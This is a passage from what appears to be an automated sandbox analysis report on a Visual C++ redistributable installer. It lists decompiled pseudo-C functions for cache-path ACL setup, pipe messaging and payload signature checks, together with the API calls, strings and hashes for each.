                                                                          • Failed to start bootstrapper application., xrefs: 00014717
                                                                          • Failed to create user for UX., xrefs: 000146D5
                                                                          • Unexpected return value from message pump., xrefs: 0001479F
                                                                          • wininet.dll, xrefs: 000146E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Message$CurrentPeekThread
                                                                          • String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
                                                                          • API String ID: 673430819-2573580774
                                                                          • Opcode ID: 590255ee4feb12738ae071a7b1d0ba50af480dc35d896fc5f4320ecefb017cce
                                                                          • Instruction ID: 95d1207e8d76a2bb0e301a72b0507e481b49efc6359bcfc3a05c49fdf52d2790
                                                                          • Opcode Fuzzy Hash: 590255ee4feb12738ae071a7b1d0ba50af480dc35d896fc5f4320ecefb017cce
                                                                          • Instruction Fuzzy Hash: 0141C371604616BFEB149BA4CC85EFFB3ACEF05315F100125F905EB1A1EB24ED8487A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			E00028CB5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                          				signed int _v8;
                                                                          				char _v40;
                                                                          				char _v72;
                                                                          				char _v104;
                                                                          				char _v108;
                                                                          				char _v136;
                                                                          				signed int _v140;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t18;
                                                                          				void* _t23;
                                                                          				signed short _t31;
                                                                          				void* _t40;
                                                                          				void* _t41;
                                                                          				void* _t44;
                                                                          				intOrPtr _t45;
                                                                          				intOrPtr* _t46;
                                                                          				signed short _t50;
                                                                          				signed short _t54;
                                                                          				signed int _t55;
                                                                          				void* _t59;
                                                                          
                                                                          				_t59 = __eflags;
                                                                          				_t44 = __edx;
                                                                          				_t41 = __ecx;
                                                                          				_t18 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t18 ^ _t55;
                                                                          				_t45 = _a4;
                                                                          				E0003F670(_t45,  &_v136, 0, 0x80);
                                                                          				_v140 = _v140 & 0x00000000;
                                                                          				_t23 = E00028A54(_t41, _t59, 0x1a, 0x1f01ff,  &_v136);
                                                                          				_t40 = 4;
                                                                          				if(_t23 >= 0) {
                                                                          					__eflags = E00028A54(_t41, __eflags, 0x16, 0x1f01ff,  &_v104);
                                                                          					if(__eflags >= 0) {
                                                                          						__eflags = E00028A54(_t41, __eflags, 1, 0xa0000000,  &_v72);
                                                                          						if(__eflags >= 0) {
                                                                          							_t50 = E00028A54(_t41, __eflags, 0x1b, 0xa0000000,  &_v40);
                                                                          							__eflags = _t50;
                                                                          							if(_t50 >= 0) {
                                                                          								_t31 =  &_v136;
                                                                          								__imp__SetEntriesInAclW(_t40, _t31, 0,  &_v140);
                                                                          								__eflags = _t31;
                                                                          								if(_t31 == 0) {
                                                                          									_t50 = E000554F8(_t41, _t45, 1, 0x80000005, _v108, 0, _v140, 0, 3, 0x7d0);
                                                                          									__eflags = _t50;
                                                                          									if(_t50 < 0) {
                                                                          										_push(_t45);
                                                                          										_push("Failed to secure cache path: %ls");
                                                                          										goto L12;
                                                                          									}
                                                                          								} else {
                                                                          									__eflags = _t31;
                                                                          									_t54 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          									__eflags = _t54;
                                                                          									_t50 =  >=  ? 0x80004005 : _t54;
                                                                          									E000137D3(0x80004005, "cache.cpp", 0x63f, _t50);
                                                                          									_push(_t45);
                                                                          									_push("Failed to create ACL to secure cache path: %ls");
                                                                          									goto L12;
                                                                          								}
                                                                          							} else {
                                                                          								_push(_t45);
                                                                          								_push("Failed to allocate access for Users group to path: %ls");
                                                                          								goto L12;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_t45);
                                                                          							_push("Failed to allocate access for Everyone group to path: %ls");
                                                                          							goto L12;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_t45);
                                                                          						_push("Failed to allocate access for SYSTEM group to path: %ls");
                                                                          						goto L12;
                                                                          					}
                                                                          				} else {
                                                                          					_push(_t45);
                                                                          					_push("Failed to allocate access for Administrators group to path: %ls");
                                                                          					L12:
                                                                          					_push(_t50);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v140 != 0) {
                                                                          					LocalFree(_v140);
                                                                          				}
                                                                          				_t46 =  &_v108;
                                                                          				do {
                                                                          					if( *_t46 != 0) {
                                                                          						E00013999( *_t46);
                                                                          					}
                                                                          					_t46 = _t46 + 0x20;
                                                                          					_t40 = _t40 - 1;
                                                                          				} while (_t40 != 0);
                                                                          				return E0003DE36(_t40, _v8 ^ _t55, _t44, _t46, _t50);
                                                                          			}

                                                                          APIs
                                                                          • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00028E01
                                                                          Strings
                                                                          • Failed to secure cache path: %ls, xrefs: 00028DE4
                                                                          • Failed to allocate access for Users group to path: %ls, xrefs: 00028D6B
                                                                          • Failed to allocate access for Everyone group to path: %ls, xrefs: 00028D4A
                                                                          • cache.cpp, xrefs: 00028DAC
                                                                          • Failed to allocate access for Administrators group to path: %ls, xrefs: 00028D08
                                                                          • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00028D29
                                                                          • Failed to create ACL to secure cache path: %ls, xrefs: 00028DB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLocal
                                                                          • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                          • API String ID: 2826327444-4113288589
                                                                          • Opcode ID: 68d0d6d61769c85615cc7b2cd8ea380f12b897f603611040b4238711a61024ad
                                                                          • Instruction ID: 6ca151ac05983e5e4ee0460ea95be61a8ad3324ac1f022edb2357cf63b105d2d
                                                                          • Opcode Fuzzy Hash: 68d0d6d61769c85615cc7b2cd8ea380f12b897f603611040b4238711a61024ad
                                                                          • Instruction Fuzzy Hash: B341F675E42239B6EB3196609C46FEF7BACEF50710F418065FA08BA1C2DE619D48C7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			E0002473A(void* _a4, signed int* _a8) {
                                                                          				long _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				void* _t26;
                                                                          				int _t30;
                                                                          				long _t31;
                                                                          				void* _t34;
                                                                          				signed short _t41;
                                                                          				void* _t43;
                                                                          				signed int _t44;
                                                                          				signed int* _t48;
                                                                          				signed int _t49;
                                                                          
                                                                          				_t49 = 0;
                                                                          				_v16 = _v16 & 0;
                                                                          				_v12 = _v12 & 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				_t43 = 0;
                                                                          				do {
                                                                          					_push(0);
                                                                          					_push( &_v8);
                                                                          					_t26 = 8;
                                                                          					_t30 = ReadFile(_a4,  &_v16 + _t43, _t26 - _t43, ??, ??);
                                                                          					_t48 = _a8;
                                                                          					if(_t30 != 0) {
                                                                          						goto L6;
                                                                          					} else {
                                                                          						_t41 = GetLastError();
                                                                          						if(_t41 != 0xea) {
                                                                          							if(_t41 == 0x6d) {
                                                                          								_t44 = 0;
                                                                          								_t31 = 0;
                                                                          								_v16 = 0;
                                                                          								_v12 = 0;
                                                                          								_t49 = 1;
                                                                          								L8:
                                                                          								 *_t48 = _t44;
                                                                          								_t48[1] = _t31;
                                                                          								if(_t31 != 0) {
                                                                          									_t34 = E000138D4(_t31, 0);
                                                                          									_t48[3] = _t34;
                                                                          									if(_t34 != 0) {
                                                                          										if(ReadFile(_a4, _t34, _t48[1],  &_v8, 0) != 0) {
                                                                          											_t48[2] = 1;
                                                                          										} else {
                                                                          											_t53 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          											_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "pipe.cpp", 0x327, _t49);
                                                                          											_push("Failed to read data for message.");
                                                                          											goto L12;
                                                                          										}
                                                                          									} else {
                                                                          										_t49 = 0x8007000e;
                                                                          										E000137D3(_t34, "pipe.cpp", 0x323, 0x8007000e);
                                                                          										_push("Failed to allocate data for message.");
                                                                          										goto L12;
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_t49 =  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
                                                                          								if(_t49 < 0) {
                                                                          									E000137D3(_t41, "pipe.cpp", 0x318, _t49);
                                                                          									_push("Failed to read message from pipe.");
                                                                          									L12:
                                                                          									_push(_t49);
                                                                          									E0005012F();
                                                                          								} else {
                                                                          									goto L6;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t49 = 0;
                                                                          							goto L6;
                                                                          						}
                                                                          					}
                                                                          					if(_t48[2] == 0 && _t48[3] != 0) {
                                                                          						E00013999(_t48[3]);
                                                                          					}
                                                                          					return _t49;
                                                                          					L6:
                                                                          					_t43 = _t43 + _v8;
                                                                          				} while (_t43 < 8);
                                                                          				_t31 = _v12;
                                                                          				_t44 = _v16;
                                                                          				goto L8;
                                                                          			}
















                                                                          APIs
                                                                          • ReadFile.KERNEL32(00000000,?,00000008,00014740,00000000,?,00000000,00000000,?,00000000,00014740,?,?,00000000,?,00000000), ref: 00024765
                                                                          • GetLastError.KERNEL32 ref: 00024772
                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0002481B
                                                                          • GetLastError.KERNEL32 ref: 00024825
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID: @Met$Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
                                                                          • API String ID: 1948546556-3410827865
                                                                          • Opcode ID: cefbc7355b0cca5778f415fe8588e0b0ef14754e714ccff9dcfc79669846df89
                                                                          • Instruction ID: 62bac267be5a7fdf36f983e451876103692d37a5fd892599ebd6c1a6596b2148
                                                                          • Opcode Fuzzy Hash: cefbc7355b0cca5778f415fe8588e0b0ef14754e714ccff9dcfc79669846df89
                                                                          • Instruction Fuzzy Hash: D631F272A54339BBEB209BA5EC45BAEF7A9EF01711F108129F811E6180DB749E408BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 38%
                                                                          			E000251E9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _t45;
                                                                          				void* _t48;
                                                                          
                                                                          				_t39 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t48 = E0004F7B2( &_v12,  &_v8, _a8);
                                                                          				if(_t48 >= 0) {
                                                                          					_t48 = E0004F7B2( &_v12,  &_v8, _a12);
                                                                          					if(_t48 >= 0) {
                                                                          						_t45 = _a4;
                                                                          						if( *((intOrPtr*)(_t45 + 0x14)) == 0xffffffff) {
                                                                          							L8:
                                                                          							_t48 = E00024880(_t39,  *((intOrPtr*)(_t45 + 0x10)), 0xf0000003, _v12, _v8);
                                                                          							if(_t48 >= 0) {
                                                                          								if( *(_t45 + 0xc) != 0 && WaitForSingleObject( *(_t45 + 0xc), 0x2bf20) == 0xffffffff) {
                                                                          									_t52 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
                                                                          									_t48 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
                                                                          									E000137D3(0x80004005, "pipe.cpp", 0x242, _t48);
                                                                          									_push("Failed to wait for child process exit.");
                                                                          									goto L13;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to post terminate message to child process.");
                                                                          								goto L13;
                                                                          							}
                                                                          						} else {
                                                                          							_t48 = E00024880(_t39,  *((intOrPtr*)(_t45 + 0x14)), 0xf0000003, _v12, _v8);
                                                                          							if(_t48 >= 0) {
                                                                          								goto L8;
                                                                          							} else {
                                                                          								_push("Failed to post terminate message to child process cache thread.");
                                                                          								L13:
                                                                          								_push(_t48);
                                                                          								E0005012F();
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to write restart to message buffer.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to write exit code to message buffer.");
                                                                          					L2:
                                                                          					_push(_t48);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t48;
                                                                          			}








                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,00015386,00000000,00000000,?,00000000), ref: 00025292
                                                                          • GetLastError.KERNEL32(?,?,?,00014B5B,?,?,00000000,?,?,?,?,?,?,0005B490,?,?), ref: 0002529D
                                                                          Strings
                                                                          • Failed to post terminate message to child process., xrefs: 0002527D
                                                                          • Failed to wait for child process exit., xrefs: 000252CB
                                                                          • Failed to write exit code to message buffer., xrefs: 0002520D
                                                                          • pipe.cpp, xrefs: 000252C1
                                                                          • Failed to post terminate message to child process cache thread., xrefs: 00025261
                                                                          • Failed to write restart to message buffer., xrefs: 00025235
                                                                          • @Met, xrefs: 0002529D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastObjectSingleWait
                                                                          • String ID: @Met$Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                          • API String ID: 1211598281-3681422729
                                                                          • Opcode ID: a58fb3930131d2d1637a2d3e22cbe4b542fbc80d65580a37490ac3ac73abdb02
                                                                          • Instruction ID: a835de5c42e67a6417e5d34e37b1f4d82a9d86799f22e75fb18ef366449635de
                                                                          • Opcode Fuzzy Hash: a58fb3930131d2d1637a2d3e22cbe4b542fbc80d65580a37490ac3ac73abdb02
                                                                          • Instruction Fuzzy Hash: 4921E632941B39FBDB125A94AC02ADF77B8EF01722F110321F900B61D1D735AD549AE8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00028E92(void* __edx, intOrPtr* _a4, WCHAR* _a8) {
                                                                          				void* _t22;
                                                                          				void* _t23;
                                                                          				intOrPtr* _t25;
                                                                          				struct _SECURITY_ATTRIBUTES* _t27;
                                                                          
                                                                          				_t23 = __edx;
                                                                          				_t27 = 0;
                                                                          				_t22 = CreateFileW(_a8, 0x80000000, 5, 0, 3, 0x8000000, 0);
                                                                          				if(_t22 != 0xffffffff) {
                                                                          					L5:
                                                                          					_t25 = _a4;
                                                                          					__eflags =  *((intOrPtr*)(_t25 + 0x20));
                                                                          					if( *((intOrPtr*)(_t25 + 0x20)) == 0) {
                                                                          						__eflags =  *((intOrPtr*)(_t25 + 0x1c));
                                                                          						if( *((intOrPtr*)(_t25 + 0x1c)) == 0) {
                                                                          							__eflags =  *((intOrPtr*)(_t25 + 0x30));
                                                                          							if(__eflags == 0) {
                                                                          								L15:
                                                                          								__eflags = _t22 - 0xffffffff;
                                                                          								if(_t22 != 0xffffffff) {
                                                                          									CloseHandle(_t22);
                                                                          								}
                                                                          								L17:
                                                                          								return _t27;
                                                                          							}
                                                                          							_t27 = E00028F8E(_t23, __eflags,  *((intOrPtr*)(_t25 + 0x30)),  *((intOrPtr*)(_t25 + 0x34)), _a8, _t22);
                                                                          							__eflags = _t27;
                                                                          							if(_t27 >= 0) {
                                                                          								goto L15;
                                                                          							}
                                                                          							_push( *_t25);
                                                                          							_push("Failed to verify hash of payload: %ls");
                                                                          							L14:
                                                                          							_push(_t27);
                                                                          							E0005012F();
                                                                          							goto L15;
                                                                          						}
                                                                          						_t27 = E000291F7(_t23, _t25, _a8, _t22);
                                                                          						__eflags = _t27;
                                                                          						if(_t27 >= 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_push( *_t25);
                                                                          						_push("Failed to verify catalog signature of payload: %ls");
                                                                          						goto L14;
                                                                          					}
                                                                          					_t27 = E0002A998(_t23, _t25, _a8, _t22);
                                                                          					__eflags = _t27;
                                                                          					if(_t27 >= 0) {
                                                                          						goto L15;
                                                                          					}
                                                                          					_push( *_t25);
                                                                          					_push("Failed to verify signature of payload: %ls");
                                                                          					goto L14;
                                                                          				}
                                                                          				_t27 =  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
                                                                          				if(_t27 != 0x80070003 && _t27 != 0x80070002) {
                                                                          					if(_t27 >= 0) {
                                                                          						goto L5;
                                                                          					}
                                                                          					E000137D3(_t19, "cache.cpp", 0x5ba, _t27);
                                                                          					E0005012F(_t27, "Failed to open payload at path: %ls", _a8);
                                                                          				}
                                                                          			}








                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00029CFF,00000003,000007D0,00000003,?,000007D0), ref: 00028EAC
                                                                          • GetLastError.KERNEL32(?,00029CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000,-00000004), ref: 00028EB9
                                                                          • CloseHandle.KERNEL32(00000000,?,00029CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000), ref: 00028F80
                                                                          Strings
                                                                          • Failed to open payload at path: %ls, xrefs: 00028EFC
                                                                          • Failed to verify signature of payload: %ls, xrefs: 00028F28
                                                                          • Failed to verify catalog signature of payload: %ls, xrefs: 00028F47
                                                                          • cache.cpp, xrefs: 00028EEF
                                                                          • Failed to verify hash of payload: %ls, xrefs: 00028F6B
                                                                          • @Met, xrefs: 00028EB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: @Met$Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                          • API String ID: 2528220319-499153605
                                                                          • Opcode ID: 7bc1cd10104afcc362edcc5231e21c68b3fde6f4e846590c6dd4a525bd2de4e6
                                                                          • Instruction ID: fef903604bc6520897dcf580292e864328ad8d13f17f0ef4899f9852b522070c
                                                                          • Opcode Fuzzy Hash: 7bc1cd10104afcc362edcc5231e21c68b3fde6f4e846590c6dd4a525bd2de4e6
                                                                          • Instruction Fuzzy Hash: 492147396016317BD7A21A64AD49B9F7B5BBF04361F008220FD046A191DB359C609BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E000169B8(void* __ebx, void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				char _v1048;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t10;
                                                                          				WCHAR* _t19;
                                                                          				signed short _t25;
                                                                          				signed short _t28;
                                                                          				void* _t31;
                                                                          				void* _t36;
                                                                          				intOrPtr _t39;
                                                                          				void* _t40;
                                                                          				signed int _t47;
                                                                          
                                                                          				_t36 = __edx;
                                                                          				_t31 = __ebx;
                                                                          				_t10 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t10 ^ _t47;
                                                                          				_t39 = _a8;
                                                                          				E0003F670(0x208,  &_v528, 0, 0x208);
                                                                          				E0003F670(0x208,  &_v1048, 0, 0x208);
                                                                          				if(GetWindowsDirectoryW( &_v528, 0x104) != 0) {
                                                                          					_t19 =  &_v528;
                                                                          					__imp__GetVolumePathNameW(_t19,  &_v1048, 0x104);
                                                                          					if(_t19 != 0) {
                                                                          						_t40 = E000302F4(_t39,  &_v1048, 0);
                                                                          						if(_t40 < 0) {
                                                                          							_push("Failed to set variant value.");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						_t25 = GetLastError();
                                                                          						_t43 =  <=  ? _t25 : _t25 & 0x0000ffff | 0x80070000;
                                                                          						_t40 =  >=  ? 0x80004005 :  <=  ? _t25 : _t25 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "variable.cpp", 0x7b4, _t40);
                                                                          						_push("Failed to get volume path name.");
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					_t28 = GetLastError();
                                                                          					_t46 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                          					_t40 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x7ae, _t40);
                                                                          					_push("Failed to get windows directory.");
                                                                          					L6:
                                                                          					_push(_t40);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t31, _v8 ^ _t47, _t36, 0x104, _t40);
                                                                          			}



















                                                                          APIs
                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00016A03
                                                                          • GetLastError.KERNEL32 ref: 00016A0D
                                                                          • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00016A51
                                                                          • GetLastError.KERNEL32 ref: 00016A5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                          • String ID: @Met$Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 124030351-2161497863
                                                                          • Opcode ID: a88f4c3c981d7b49c49f1f3d381756d1425de637208ed56a2d85feacf5733445
                                                                          • Instruction ID: 94b57139c571407bfa5d87413d565f5a1afb2879d294c2def1715c3d9cd9c098
                                                                          • Opcode Fuzzy Hash: a88f4c3c981d7b49c49f1f3d381756d1425de637208ed56a2d85feacf5733445
                                                                          • Instruction Fuzzy Hash: BE21C772F407286AE720A6A59C46FEB77ECDF40711F014166FE05F7181EA349D848AA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00019B3F(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				signed char _t18;
                                                                          				intOrPtr _t19;
                                                                          				signed short _t24;
                                                                          				intOrPtr _t29;
                                                                          				void* _t34;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t33 = _a4;
                                                                          				_t34 = E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0);
                                                                          				if(_t34 >= 0) {
                                                                          					_t18 = GetFileAttributesW(_v8);
                                                                          					if(_t18 != 0xffffffff) {
                                                                          						asm("xorps xmm0, xmm0");
                                                                          						asm("movlpd [ebp-0xc], xmm0");
                                                                          						if((_t18 & 0x00000010) != 0) {
                                                                          							goto L9;
                                                                          						} else {
                                                                          							_t29 = 1;
                                                                          							_t19 = 0;
                                                                          							goto L10;
                                                                          						}
                                                                          						L16:
                                                                          					} else {
                                                                          						_t24 = GetLastError();
                                                                          						if(_t24 == 2 || _t24 == 3) {
                                                                          							_push(_v8);
                                                                          							E0005061A(2, "File search: %ls, did not find path: %ls",  *_t33);
                                                                          							goto L8;
                                                                          						} else {
                                                                          							if(_t24 == 0) {
                                                                          								L8:
                                                                          								asm("xorps xmm0, xmm0");
                                                                          								asm("movlpd [ebp-0xc], xmm0");
                                                                          								L9:
                                                                          								_t29 = _v16;
                                                                          								_t19 = _v12;
                                                                          								L10:
                                                                          								_t34 = E00018152(_a8,  *((intOrPtr*)(_t33 + 4)), _t29, _t19, 0);
                                                                          								if(_t34 < 0) {
                                                                          									_push("Failed to set variable.");
                                                                          									goto L12;
                                                                          								}
                                                                          							} else {
                                                                          								_t37 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          								_t34 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "search.cpp", 0x28b, _t34);
                                                                          								E0005012F(_t34, "Failed get to file attributes. \'%ls\'",  *((intOrPtr*)(_t33 + 0x14)));
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format variable string.");
                                                                          					L12:
                                                                          					_push(_t34);
                                                                          					E0005012F();
                                                                          				}
                                                                          				E00012793(_v8);
                                                                          				return _t34;
                                                                          				goto L16;
                                                                          			}












                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019B5A
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 00019B72
                                                                          • GetLastError.KERNEL32 ref: 00019B81
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00019C07
                                                                          • Failed to format variable string., xrefs: 00019B65
                                                                          • File search: %ls, did not find path: %ls, xrefs: 00019BD5
                                                                          • search.cpp, xrefs: 00019BB3
                                                                          • Failed get to file attributes. '%ls', xrefs: 00019BC0
                                                                          • @Met, xrefs: 00019B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
